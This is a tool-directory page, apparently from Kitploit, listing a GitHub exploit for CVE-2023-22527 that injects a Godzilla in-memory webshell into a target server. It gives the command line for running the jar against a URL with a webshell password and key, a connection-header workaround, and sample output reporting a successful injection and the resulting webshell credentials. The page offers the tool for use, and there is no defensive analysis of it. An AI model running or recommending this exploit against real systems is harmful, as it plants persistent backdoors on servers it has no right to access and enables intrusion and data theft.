Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-22527-Godzilla-MEMSHELL — CVE-2023-22527 内存马注入工具 | Kitploit
Tools/GitHubGitHub/boogipop/cve-2023-22527-godzilla-memshell
ExploitationShellcodeWeb Application ExploitationPenetration TestingRed Teaming
GitHubboogipop/cve-2023-22527-godzilla-memshell

CVE-2023-22527-Godzilla-MEMSHELL

CVE-2023-22527 内存马注入工具

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
761022 years agoReviewed by Kitploit
Share

CVE-2023-22527-Godzilla-MEMSHELL

Usage

ps: The tested version is 8.5.1. Other versions should work, but they haven't been tested.

root@kitploit:~
内容参考北辰师傅之前的工具

java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url 哥斯拉密码 哥斯拉密钥

example
        java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/  pass key

If the memory shell has been successfully injected but Godzilla cannot connect, add the following protocol header to the request configuration or configure Burp proxy for Godzilla.

root@kitploit:~
Connection: close
root@kitploit:~

$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key

img.png

Download Tool